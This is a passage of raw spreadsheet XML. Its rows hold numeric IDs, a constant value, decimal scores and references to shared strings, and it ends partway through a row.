    <row r="7548" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7548" s="1">
        <v>7546</v>
      </c>
      <c r="B7548">
        <v>3509</v>
      </c>
      <c r="C7548">
        <v>3509</v>
      </c>
      <c r="D7548">
        <v>4</v>
      </c>
      <c r="E7548">
        <v>0.50410002470016479</v>
      </c>
      <c r="F7548" t="s">
        <v>13461</v>
      </c>
      <c r="G7548" t="s">
        <v>14934</v>
      </c>
      <c r="H7548" t="s">
        <v>14935</v>
      </c>
    </row>
    <row r="7549" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7549" s="1">
        <v>7547</v>
      </c>
      <c r="B7549">
        <v>3490</v>
      </c>
      <c r="C7549">
        <v>3490</v>
      </c>
      <c r="D7549">
        <v>4</v>
      </c>
      <c r="E7549">
        <v>0.51160001754760742</v>
      </c>
      <c r="F7549" t="s">
        <v>13461</v>
      </c>
      <c r="G7549" t="s">
        <v>14936</v>
      </c>
      <c r="H7549" t="s">
        <v>14937</v>
      </c>
    </row>
    <row r="7550" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7550" s="1">
        <v>7548</v>
      </c>
      <c r="B7550">
        <v>3489</v>
      </c>
      <c r="C7550">
        <v>3489</v>
      </c>
      <c r="D7550">
        <v>4</v>
      </c>
      <c r="E7550">
        <v>0.41839998960495001</v>
      </c>
      <c r="F7550" t="s">
        <v>13461</v>
      </c>
      <c r="G7550" t="s">
        <v>14938</v>
      </c>
      <c r="H7550" t="s">
        <v>14939</v>
      </c>
    </row>
    <row r="7551" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7551" s="1">
        <v>7549</v>
      </c>
      <c r="B7551">
        <v>6928</v>
      </c>
      <c r="C7551">
        <v>6928</v>
      </c>
      <c r="D7551">
        <v>4</v>
      </c>
      <c r="E7551">
        <v>0.993399977684021</v>
      </c>
      <c r="F7551" t="s">
        <v>13461</v>
      </c>
      <c r="G7551" t="s">
        <v>14940</v>
      </c>
      <c r="H7551" t="s">
        <v>14941</v>
      </c>
    </row>
    <row r="7552" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7552" s="1">
        <v>7550</v>
      </c>
      <c r="B7552">
        <v>2218</v>
      </c>
      <c r="C7552">
        <v>2218</v>
      </c>
      <c r="D7552">
        <v>4</v>
      </c>
      <c r="E7552">
        <v>0.53450000286102295</v>
      </c>
      <c r="F7552" t="s">
        <v>13461</v>
      </c>
      <c r="G7552" t="s">
        <v>14942</v>
      </c>
      <c r="H7552" t="s">
        <v>14943</v>
      </c>
    </row>
    <row r="7553" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7553" s="1">
        <v>7551</v>
      </c>
      <c r="B7553">
        <v>6925</v>
      </c>
      <c r="C7553">
        <v>6925</v>
      </c>
      <c r="D7553">
        <v>4</v>
      </c>
      <c r="E7553">
        <v>0.42359998822212219</v>
      </c>
      <c r="F7553" t="s">
        <v>13461</v>
      </c>
      <c r="G7553" t="s">
        <v>14944</v>
      </c>
      <c r="H7553" t="s">
        <v>14945</v>
      </c>
    </row>
    <row r="7554" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7554" s="1">
        <v>7552</v>
      </c>
      <c r="B7554">
        <v>2234</v>
      </c>
      <c r="C7554">
        <v>2234</v>
      </c>
      <c r="D7554">
        <v>4</v>
      </c>
      <c r="E7554">
        <v>0.99849998950958252</v>
      </c>
      <c r="F7554" t="s">
        <v>13461</v>
      </c>
      <c r="G7554" t="s">
        <v>14946</v>
      </c>
      <c r="H7554" t="s">
        <v>14947</v>
      </c>
    </row>
    <row r="7555" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7555" s="1">
        <v>7553</v>
      </c>
      <c r="B7555">
        <v>6923</v>
      </c>
      <c r="C7555">
        <v>6923</v>
      </c>
      <c r="D7555">
        <v>4</v>
      </c>
      <c r="E7555">
        <v>0.95929998159408569</v>
      </c>
      <c r="F7555" t="s">
        <v>13461</v>
      </c>
      <c r="G7555" t="s">
        <v>14948</v>
      </c>
      <c r="H7555" t="s">
        <v>14949</v>
      </c>
    </row>
    <row r="7556" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7556" s="1">
        <v>7554</v>
      </c>
      <c r="B7556">
        <v>2239</v>
      </c>
      <c r="C7556">
        <v>2239</v>
      </c>
      <c r="D7556">
        <v>4</v>
      </c>
      <c r="E7556">
        <v>0.75169998407363892</v>
      </c>
      <c r="F7556" t="s">
        <v>13461</v>
      </c>
      <c r="G7556" t="s">
        <v>14950</v>
      </c>
      <c r="H7556" t="s">
        <v>14951</v>
      </c>
    </row>
    <row r="7557" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7557" s="1">
        <v>7555</v>
      </c>
      <c r="B7557">
        <v>2240</v>
      </c>
      <c r="C7557">
        <v>2240</v>
      </c>
      <c r="D7557">
        <v>4</v>
      </c>
      <c r="E7557">
        <v>0.99919998645782471</v>
      </c>
      <c r="F7557" t="s">
        <v>13461</v>
      </c>
      <c r="G7557" t="s">
        <v>14952</v>
      </c>
      <c r="H7557" t="s">
        <v>14953</v>
      </c>
    </row>
    <row r="7558" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7558" s="1">
        <v>7556</v>
      </c>
      <c r="B7558">
        <v>6919</v>
      </c>
      <c r="C7558">
        <v>6919</v>
      </c>
      <c r="D7558">
        <v>4</v>
      </c>
      <c r="E7558">
        <v>0.89429998397827148</v>
      </c>
      <c r="F7558" t="s">
        <v>13461</v>
      </c>
      <c r="G7558" t="s">
        <v>14954</v>
      </c>
      <c r="H7558" t="s">
        <v>14955</v>
      </c>
    </row>
    <row r="7559" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7559" s="1">
        <v>7557</v>
      </c>
      <c r="B7559">
        <v>2241</v>
      </c>
      <c r="C7559">
        <v>2241</v>
      </c>
      <c r="D7559">
        <v>4</v>
      </c>
      <c r="E7559">
        <v>0.88770002126693726</v>
      </c>
      <c r="F7559" t="s">
        <v>13461</v>
      </c>
      <c r="G7559" t="s">
        <v>14956</v>
      </c>
      <c r="H7559" t="s">
        <v>14957</v>
      </c>
    </row>
    <row r="7560" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7560" s="1">
        <v>7558</v>
      </c>
      <c r="B7560">
        <v>2216</v>
      </c>
      <c r="C7560">
        <v>2216</v>
      </c>
      <c r="D7560">
        <v>4</v>
      </c>
      <c r="E7560">
        <v>0.8497999906539917</v>
      </c>
      <c r="F7560" t="s">
        <v>13461</v>
      </c>
      <c r="G7560" t="s">
        <v>14958</v>
      </c>
      <c r="H7560" t="s">
        <v>14420</v>
      </c>
    </row>
    <row r="7561" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7561" s="1">
        <v>7559</v>
      </c>
      <c r="B7561">
        <v>6916</v>
      </c>
      <c r="C7561">
        <v>6916</v>
      </c>
      <c r="D7561">
        <v>4</v>
      </c>
      <c r="E7561">
        <v>0.67000001668930054</v>
      </c>
      <c r="F7561" t="s">
        <v>13461</v>
      </c>
      <c r="G7561" t="s">
        <v>14959</v>
      </c>
      <c r="H7561" t="s">
        <v>14960</v>
      </c>
    </row>
    <row r="7562" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7562" s="1">
        <v>7560</v>
      </c>
      <c r="B7562">
        <v>6914</v>
      </c>
      <c r="C7562">
        <v>6914</v>
      </c>
      <c r="D7562">
        <v>4</v>
      </c>
      <c r="E7562">
        <v>0.59390002489089966</v>
      </c>
      <c r="F7562" t="s">
        <v>13461</v>
      </c>
      <c r="G7562" t="s">
        <v>14961</v>
      </c>
      <c r="H7562" t="s">
        <v>14962</v>
      </c>
    </row>
    <row r="7563" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7563" s="1">
        <v>7561</v>
      </c>
      <c r="B7563">
        <v>2253</v>
      </c>
      <c r="C7563">
        <v>2253</v>
      </c>
      <c r="D7563">
        <v>4</v>
      </c>
      <c r="E7563">
        <v>0.49169999361038208</v>
      </c>
      <c r="F7563" t="s">
        <v>13461</v>
      </c>
      <c r="G7563" t="s">
        <v>14963</v>
      </c>
      <c r="H7563" t="s">
        <v>14964</v>
      </c>
    </row>
    <row r="7564" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7564" s="1">
        <v>7562</v>
      </c>
      <c r="B7564">
        <v>2257</v>
      </c>
      <c r="C7564">
        <v>2257</v>
      </c>
      <c r="D7564">
        <v>4</v>
      </c>
      <c r="E7564">
        <v>0.65630000829696655</v>
      </c>
      <c r="F7564" t="s">
        <v>13461</v>
      </c>
      <c r="G7564" t="s">
        <v>14965</v>
      </c>
      <c r="H7564" t="s">
        <v>14966</v>
      </c>
    </row>
    <row r="7565" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7565" s="1">
        <v>7563</v>
      </c>
      <c r="B7565">
        <v>6908</v>
      </c>
      <c r="C7565">
        <v>6908</v>
      </c>
      <c r="D7565">
        <v>4</v>
      </c>
      <c r="E7565">
        <v>0.50340002775192261</v>
      </c>
      <c r="F7565" t="s">
        <v>13461</v>
      </c>
      <c r="G7565" t="s">
        <v>14967</v>
      </c>
      <c r="H7565" t="s">
        <v>14968</v>
      </c>
    </row>
    <row r="7566" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7566" s="1">
        <v>7564</v>
      </c>
      <c r="B7566">
        <v>2262</v>
      </c>
      <c r="C7566">
        <v>2262</v>
      </c>
      <c r="D7566">
        <v>4</v>
      </c>
      <c r="E7566">
        <v>0.85589998960494995</v>
      </c>
      <c r="F7566" t="s">
        <v>13461</v>
      </c>
      <c r="G7566" t="s">
        <v>14969</v>
      </c>
      <c r="H7566" t="s">
        <v>14970</v>
      </c>
    </row>
    <row r="7567" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7567" s="1">
        <v>7565</v>
      </c>
      <c r="B7567">
        <v>6905</v>
      </c>
      <c r="C7567">
        <v>6905</v>
      </c>
      <c r="D7567">
        <v>4</v>
      </c>
      <c r="E7567">
        <v>0.99839997291564941</v>
      </c>
      <c r="F7567" t="s">
        <v>13461</v>
      </c>
      <c r="G7567" t="s">
        <v>14971</v>
      </c>
      <c r="H7567" t="s">
        <v>14972</v>
      </c>
    </row>
    <row r="7568" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7568" s="1">
        <v>7566</v>
      </c>
      <c r="B7568">
        <v>2271</v>
      </c>
      <c r="C7568">
        <v>2271</v>
      </c>
      <c r="D7568">
        <v>4</v>
      </c>
      <c r="E7568">
        <v>0.84240001440048218</v>
      </c>
      <c r="F7568" t="s">
        <v>13461</v>
      </c>
      <c r="G7568" t="s">
        <v>14973</v>
      </c>
      <c r="H7568" t="s">
        <v>14974</v>
      </c>
    </row>
    <row r="7569" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7569" s="1">
        <v>7567</v>
      </c>
      <c r="B7569">
        <v>6902</v>
      </c>
      <c r="C7569">
        <v>6902</v>
      </c>
      <c r="D7569">
        <v>4</v>
      </c>
      <c r="E7569">
        <v>0.57920002937316895</v>
      </c>
      <c r="F7569" t="s">
        <v>13461</v>
      </c>
      <c r="G7569" t="s">
        <v>14975</v>
      </c>
      <c r="H7569" t="s">
        <v>14976</v>
      </c>
    </row>
    <row r="7570" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7570" s="1">
        <v>7568</v>
      </c>
      <c r="B7570">
        <v>2280</v>
      </c>
      <c r="C7570">
        <v>2280</v>
      </c>
      <c r="D7570">
        <v>4</v>
      </c>
      <c r="E7570">
        <v>0.34259998798370361</v>
      </c>
      <c r="F7570" t="s">
        <v>13461</v>
      </c>
      <c r="G7570" t="s">
        <v>14977</v>
      </c>
      <c r="H7570" t="s">
        <v>14978</v>
      </c>
    </row>
    <row r="7571" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7571" s="1">
        <v>7569</v>
      </c>
      <c r="B7571">
        <v>2249</v>
      </c>
      <c r="C7571">
        <v>2249</v>
      </c>
      <c r="D7571">
        <v>4</v>
      </c>
      <c r="E7571">
        <v>0.99650001525878906</v>
      </c>
      <c r="F7571" t="s">
        <v>13461</v>
      </c>
      <c r="G7571" t="s">
        <v>14979</v>
      </c>
      <c r="H7571" t="s">
        <v>14980</v>
      </c>
    </row>
    <row r="7572" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7572" s="1">
        <v>7570</v>
      </c>
      <c r="B7572">
        <v>2282</v>
      </c>
      <c r="C7572">
        <v>2282</v>
      </c>
      <c r="D7572">
        <v>4</v>
      </c>
      <c r="E7572">
        <v>0.5845000147819519</v>
      </c>
      <c r="F7572" t="s">
        <v>13461</v>
      </c>
      <c r="G7572" t="s">
        <v>14981</v>
      </c>
      <c r="H7572" t="s">
        <v>14982</v>
      </c>
    </row>
    <row r="7573" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7573" s="1">
        <v>7571</v>
      </c>
      <c r="B7573">
        <v>2213</v>
      </c>
      <c r="C7573">
        <v>2213</v>
      </c>
      <c r="D7573">
        <v>4</v>
      </c>
      <c r="E7573">
        <v>0.85100001096725464</v>
      </c>
      <c r="F7573" t="s">
        <v>13461</v>
      </c>
      <c r="G7573" t="s">
        <v>14983</v>
      </c>
      <c r="H7573" t="s">
        <v>14984</v>
      </c>
    </row>
    <row r="7574" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7574" s="1">
        <v>7572</v>
      </c>
      <c r="B7574">
        <v>2193</v>
      </c>
      <c r="C7574">
        <v>2193</v>
      </c>
      <c r="D7574">
        <v>4</v>
      </c>
      <c r="E7574">
        <v>0.98970001935958862</v>
      </c>
      <c r="F7574" t="s">
        <v>13461</v>
      </c>
      <c r="G7574" t="s">
        <v>14985</v>
      </c>
      <c r="H7574" t="s">
        <v>14986</v>
      </c>
    </row>
    <row r="7575" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7575" s="1">
        <v>7573</v>
      </c>
      <c r="B7575">
        <v>2139</v>
      </c>
      <c r="C7575">
        <v>2139</v>
      </c>
      <c r="D7575">
        <v>4</v>
      </c>
      <c r="E7575">
        <v>0.99940001964569092</v>
      </c>
      <c r="F7575" t="s">
        <v>13461</v>
      </c>
      <c r="G7575" t="s">
        <v>14987</v>
      </c>
      <c r="H7575" t="s">
        <v>14988</v>
      </c>
    </row>
    <row r="7576" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7576" s="1">
        <v>7574</v>
      </c>
      <c r="B7576">
        <v>2142</v>
      </c>
      <c r="C7576">
        <v>2142</v>
      </c>
      <c r="D7576">
        <v>4</v>
      </c>
      <c r="E7576">
        <v>0.89480000734329224</v>
      </c>
      <c r="F7576" t="s">
        <v>13461</v>
      </c>
      <c r="G7576" t="s">
        <v>14989</v>
      </c>
      <c r="H7576" t="s">
        <v>14990</v>
      </c>
    </row>
    <row r="7577" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7577" s="1">
        <v>7575</v>
      </c>
      <c r="B7577">
        <v>6975</v>
      </c>
      <c r="C7577">
        <v>6975</v>
      </c>
      <c r="D7577">
        <v>4</v>
      </c>
      <c r="E7577">
        <v>0.73320001363754272</v>
      </c>
      <c r="F7577" t="s">
        <v>13461</v>
      </c>
      <c r="G7577" t="s">
        <v>14991</v>
      </c>
      <c r="H7577" t="s">
        <v>14992</v>
      </c>
    </row>
    <row r="7578" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7578" s="1">
        <v>7576</v>
      </c>
      <c r="B7578">
        <v>6972</v>
      </c>
      <c r="C7578">
        <v>6972</v>
      </c>
      <c r="D7578">
        <v>4</v>
      </c>
      <c r="E7578">
        <v>0.84359997510910034</v>
      </c>
      <c r="F7578" t="s">
        <v>13461</v>
      </c>
      <c r="G7578" t="s">
        <v>14993</v>
      </c>
      <c r="H7578" t="s">
        <v>14994</v>
      </c>
    </row>
    <row r="7579" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7579" s="1">
        <v>7577</v>
      </c>
      <c r="B7579">
        <v>2146</v>
      </c>
      <c r="C7579">
        <v>2146</v>
      </c>
      <c r="D7579">
        <v>4</v>
      </c>
      <c r="E7579">
        <v>0.46759998798370361</v>
      </c>
      <c r="F7579" t="s">
        <v>13461</v>
      </c>
      <c r="G7579" t="s">
        <v>14995</v>
      </c>
      <c r="H7579" t="s">
        <v>14996</v>
      </c>
    </row>
    <row r="7580" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7580" s="1">
        <v>7578</v>
      </c>
      <c r="B7580">
        <v>2147</v>
      </c>
      <c r="C7580">
        <v>2147</v>
      </c>
      <c r="D7580">
        <v>4</v>
      </c>
      <c r="E7580">
        <v>0.63499999046325684</v>
      </c>
      <c r="F7580" t="s">
        <v>13461</v>
      </c>
      <c r="G7580" t="s">
        <v>14997</v>
      </c>
      <c r="H7580" t="s">
        <v>14998</v>
      </c>
    </row>
    <row r="7581" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7581" s="1">
        <v>7579</v>
      </c>
      <c r="B7581">
        <v>2148</v>
      </c>
      <c r="C7581">
        <v>2148</v>
      </c>
      <c r="D7581">
        <v>4</v>
      </c>
      <c r="E7581">
        <v>0.99510002136230469</v>
      </c>
      <c r="F7581" t="s">
        <v>13461</v>
      </c>
      <c r="G7581" t="s">
        <v>14999</v>
      </c>
      <c r="H7581" t="s">
        <v>15000</v>
      </c>
    </row>
    <row r="7582" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7582" s="1">
        <v>7580</v>
      </c>
      <c r="B7582">
        <v>2149</v>
      </c>
      <c r="C7582">
        <v>2149</v>
      </c>
      <c r="D7582">
        <v>4</v>
      </c>
      <c r="E7582">
        <v>0.98250001668930054</v>
      </c>
      <c r="F7582" t="s">
        <v>13461</v>
      </c>
      <c r="G7582" t="s">
        <v>15001</v>
      </c>
      <c r="H7582" t="s">
        <v>15002</v>
      </c>
    </row>
    <row r="7583" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7583" s="1">
        <v>7581</v>
      </c>
      <c r="B7583">
        <v>2150</v>
      </c>
      <c r="C7583">
        <v>2150</v>
      </c>
      <c r="D7583">
        <v>4</v>
      </c>
      <c r="E7583">
        <v>0.93360000848770142</v>
      </c>
      <c r="F7583" t="s">
        <v>13461</v>
      </c>
      <c r="G7583" t="s">
        <v>15003</v>
      </c>
      <c r="H7583" t="s">
        <v>15004</v>
      </c>
    </row>
    <row r="7584" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7584" s="1">
        <v>7582</v>
      </c>
      <c r="B7584">
        <v>6939</v>
      </c>
      <c r="C7584">
        <v>6939</v>
      </c>
      <c r="D7584">
        <v>4</v>
      </c>
      <c r="E7584">
        <v>0.41200000047683721</v>
      </c>
      <c r="F7584" t="s">
        <v>13461</v>
      </c>
      <c r="G7584" t="s">
        <v>15005</v>
      </c>
      <c r="H7584" t="s">
        <v>15006</v>
      </c>
    </row>
    <row r="7585" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7585" s="1">
        <v>7583</v>
      </c>
      <c r="B7585">
        <v>2152</v>
      </c>
      <c r="C7585">
        <v>2152</v>
      </c>
      <c r="D7585">
        <v>4</v>
      </c>
      <c r="E7585">
        <v>0.6841999888420105</v>
      </c>
      <c r="F7585" t="s">
        <v>13461</v>
      </c>
      <c r="G7585" t="s">
        <v>15007</v>
      </c>
      <c r="H7585" t="s">
        <v>15008</v>
      </c>
    </row>
    <row r="7586" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7586" s="1">
        <v>7584</v>
      </c>
      <c r="B7586">
        <v>2160</v>
      </c>
      <c r="C7586">
        <v>2160</v>
      </c>
      <c r="D7586">
        <v>4</v>
      </c>
      <c r="E7586">
        <v>0.63950002193450928</v>
      </c>
      <c r="F7586" t="s">
        <v>13461</v>
      </c>
      <c r="G7586" t="s">
        <v>15009</v>
      </c>
      <c r="H7586" t="s">
        <v>15010</v>
      </c>
    </row>
    <row r="7587" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7587" s="1">
        <v>7585</v>
      </c>
      <c r="B7587">
        <v>2162</v>
      </c>
      <c r="C7587">
        <v>2162</v>
      </c>
      <c r="D7587">
        <v>4</v>
      </c>
      <c r="E7587">
        <v>0.81749999523162842</v>
      </c>
      <c r="F7587" t="s">
        <v>13461</v>
      </c>
      <c r="G7587" t="s">
        <v>15011</v>
      </c>
      <c r="H7587" t="s">
        <v>15012</v>
      </c>
    </row>
    <row r="7588" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7588" s="1">
        <v>7586</v>
      </c>
      <c r="B7588">
        <v>2164</v>
      </c>
      <c r="C7588">
        <v>2164</v>
      </c>
      <c r="D7588">
        <v>4</v>
      </c>
      <c r="E7588">
        <v>0.54879999160766602</v>
      </c>
      <c r="F7588" t="s">
        <v>13461</v>
      </c>
      <c r="G7588" t="s">
        <v>15013</v>
      </c>
      <c r="H7588" t="s">
        <v>15014</v>
      </c>
    </row>
    <row r="7589" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7589" s="1">
        <v>7587</v>
      </c>
      <c r="B7589">
        <v>2165</v>
      </c>
      <c r="C7589">
        <v>2165</v>
      </c>
      <c r="D7589">
        <v>4</v>
      </c>
      <c r="E7589">
        <v>0.70829999446868896</v>
      </c>
      <c r="F7589" t="s">
        <v>13461</v>
      </c>
      <c r="G7589" t="s">
        <v>15015</v>
      </c>
      <c r="H7589" t="s">
        <v>15016</v>
      </c>
    </row>
    <row r="7590" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7590" s="1">
        <v>7588</v>
      </c>
      <c r="B7590">
        <v>2176</v>
      </c>
      <c r="C7590">
        <v>2176</v>
      </c>
      <c r="D7590">
        <v>4</v>
      </c>
      <c r="E7590">
        <v>0.53119999170303345</v>
      </c>
      <c r="F7590" t="s">
        <v>13461</v>
      </c>
      <c r="G7590" t="s">
        <v>15017</v>
      </c>
      <c r="H7590" t="s">
        <v>15018</v>
      </c>
    </row>
    <row r="7591" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7591" s="1">
        <v>7589</v>
      </c>
      <c r="B7591">
        <v>6950</v>
      </c>
      <c r="C7591">
        <v>6950</v>
      </c>
      <c r="D7591">
        <v>4</v>
      </c>
      <c r="E7591">
        <v>0.80150002241134644</v>
      </c>
      <c r="F7591" t="s">
        <v>13461</v>
      </c>
      <c r="G7591" t="s">
        <v>15019</v>
      </c>
      <c r="H7591" t="s">
        <v>15020</v>
      </c>
    </row>
    <row r="7592" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7592" s="1">
        <v>7590</v>
      </c>
      <c r="B7592">
        <v>6945</v>
      </c>
      <c r="C7592">
        <v>6945</v>
      </c>
      <c r="D7592">
        <v>4</v>
      </c>
      <c r="E7592">
        <v>0.63520002365112305</v>
      </c>
      <c r="F7592" t="s">
        <v>13461</v>
      </c>
      <c r="G7592" t="s">
        <v>15021</v>
      </c>
      <c r="H7592" t="s">
        <v>15022</v>
      </c>
    </row>
    <row r="7593" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7593" s="1">
        <v>7591</v>
      </c>
      <c r="B7593">
        <v>6944</v>
      </c>
      <c r="C7593">
        <v>6944</v>
      </c>
      <c r="D7593">
        <v>4</v>
      </c>
      <c r="E7593">
        <v>0.99489998817443848</v>
      </c>
      <c r="F7593" t="s">
        <v>13461</v>
      </c>
      <c r="G7593" t="s">
        <v>15023</v>
      </c>
      <c r="H7593" t="s">
        <v>15024</v>
      </c>
    </row>
    <row r="7594" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7594" s="1">
        <v>7592</v>
      </c>
      <c r="B7594">
        <v>2189</v>
      </c>
      <c r="C7594">
        <v>2189</v>
      </c>
      <c r="D7594">
        <v>4</v>
      </c>
      <c r="E7594">
        <v>0.68019998073577881</v>
      </c>
      <c r="F7594" t="s">
        <v>13461</v>
      </c>
      <c r="G7594" t="s">
        <v>15025</v>
      </c>
      <c r="H7594" t="s">
        <v>15026</v>
      </c>
    </row>
    <row r="7595" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7595" s="1">
        <v>7593</v>
      </c>
      <c r="B7595">
        <v>2155</v>
      </c>
      <c r="C7595">
        <v>2155</v>
      </c>
      <c r="D7595">
        <v>4</v>
      </c>
      <c r="E7595">
        <v>0.91579997539520264</v>
      </c>
      <c r="F7595" t="s">
        <v>13461</v>
      </c>
      <c r="G7595" t="s">
        <v>15027</v>
      </c>
      <c r="H7595" t="s">
        <v>15028</v>
      </c>
    </row>
    <row r="7596" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7596" s="1">
        <v>7594</v>
      </c>
      <c r="B7596">
        <v>6986</v>
      </c>
      <c r="C7596">
        <v>6986</v>
      </c>
      <c r="D7596">
        <v>4</v>
      </c>
      <c r="E7596">
        <v>0.67059999704360962</v>
      </c>
      <c r="F7596" t="s">
        <v>13461</v>
      </c>
      <c r="G7596" t="s">
        <v>15029</v>
      </c>
      <c r="H7596" t="s">
        <v>15030</v>
      </c>
    </row>
    <row r="7597" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7597" s="1">
        <v>7595</v>
      </c>
      <c r="B7597">
        <v>2285</v>
      </c>
      <c r="C7597">
        <v>2285</v>
      </c>
      <c r="D7597">
        <v>4</v>
      </c>
      <c r="E7597">
        <v>0.74980002641677856</v>
      </c>
      <c r="F7597" t="s">
        <v>13461</v>
      </c>
      <c r="G7597" t="s">
        <v>15031</v>
      </c>
      <c r="H7597" t="s">
        <v>15032</v>
      </c>
    </row>
    <row r="7598" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7598" s="1">
        <v>7596</v>
      </c>
      <c r="B7598">
        <v>2295</v>
      </c>
      <c r="C7598">
        <v>2295</v>
      </c>
      <c r="D7598">
        <v>4</v>
      </c>
      <c r="E7598">
        <v>0.95410001277923584</v>
      </c>
      <c r="F7598" t="s">
        <v>13461</v>
      </c>
      <c r="G7598" t="s">
        <v>15033</v>
      </c>
      <c r="H7598" t="s">
        <v>15034</v>
      </c>
    </row>
    <row r="7599" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7599" s="1">
        <v>7597</v>
      </c>
      <c r="B7599">
        <v>2368</v>
      </c>
      <c r="C7599">
        <v>2368</v>
      </c>
      <c r="D7599">
        <v>4</v>
      </c>
      <c r="E7599">
        <v>0.96670001745223999</v>
      </c>
      <c r="F7599" t="s">
        <v>13461</v>
      </c>
      <c r="G7599" t="s">
        <v>15035</v>
      </c>
      <c r="H7599" t="s">
        <v>15036</v>
      </c>
    </row>
    <row r="7600" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7600" s="1">
        <v>7598</v>
      </c>
      <c r="B7600">
        <v>2369</v>
      </c>
      <c r="C7600">
        <v>2369</v>
      </c>
      <c r="D7600">
        <v>4</v>
      </c>
      <c r="E7600">
        <v>0.76399999856948853</v>
      </c>
      <c r="F7600" t="s">
        <v>13461</v>
      </c>
      <c r="G7600" t="s">
        <v>15037</v>
      </c>
      <c r="H7600" t="s">
        <v>15038</v>
      </c>
    </row>
    <row r="7601" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7601" s="1">
        <v>7599</v>
      </c>
      <c r="B7601">
        <v>2370</v>
      </c>
      <c r="C7601">
        <v>2370</v>
      </c>
      <c r="D7601">
        <v>4</v>
      </c>
      <c r="E7601">
        <v>0.82059997320175171</v>
      </c>
      <c r="F7601" t="s">
        <v>13461</v>
      </c>
      <c r="G7601" t="s">
        <v>15039</v>
      </c>
      <c r="H7601" t="s">
        <v>15040</v>
      </c>
    </row>
    <row r="7602" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7602" s="1">
        <v>7600</v>
      </c>
      <c r="B7602">
        <v>2379</v>
      </c>
      <c r="C7602">
        <v>2379</v>
      </c>
      <c r="D7602">
        <v>4</v>
      </c>
      <c r="E7602">
        <v>0.49959999322891241</v>
      </c>
      <c r="F7602" t="s">
        <v>13461</v>
      </c>
      <c r="G7602" t="s">
        <v>15041</v>
      </c>
      <c r="H7602" t="s">
        <v>15042</v>
      </c>
    </row>
    <row r="7603" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7603" s="1">
        <v>7601</v>
      </c>
      <c r="B7603">
        <v>2397</v>
      </c>
      <c r="C7603">
        <v>2397</v>
      </c>
      <c r="D7603">
        <v>4</v>
      </c>
      <c r="E7603">
        <v>0.45039999485015869</v>
      </c>
      <c r="F7603" t="s">
        <v>13461</v>
      </c>
      <c r="G7603" t="s">
        <v>15043</v>
      </c>
      <c r="H7603" t="s">
        <v>15044</v>
      </c>
    </row>
    <row r="7604" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7604" s="1">
        <v>7602</v>
      </c>
      <c r="B7604">
        <v>2398</v>
      </c>
      <c r="C7604">
        <v>2398</v>
      </c>
      <c r="D7604">
        <v>4</v>
      </c>
      <c r="E7604">
        <v>0.35449999570846558</v>
      </c>
      <c r="F7604" t="s">
        <v>13461</v>
      </c>
      <c r="G7604" t="s">
        <v>15045</v>
      </c>
      <c r="H7604" t="s">
        <v>15046</v>
      </c>
    </row>
    <row r="7605" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7605" s="1">
        <v>7603</v>
      </c>
      <c r="B7605">
        <v>2409</v>
      </c>
      <c r="C7605">
        <v>2409</v>
      </c>
      <c r="D7605">
        <v>4</v>
      </c>
      <c r="E7605">
        <v>0.99409997463226318</v>
      </c>
      <c r="F7605" t="s">
        <v>13461</v>
      </c>
      <c r="G7605" t="s">
        <v>15047</v>
      </c>
      <c r="H7605" t="s">
        <v>15048</v>
      </c>
    </row>
    <row r="7606" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7606" s="1">
        <v>7604</v>
      </c>
      <c r="B7606">
        <v>6847</v>
      </c>
      <c r="C7606">
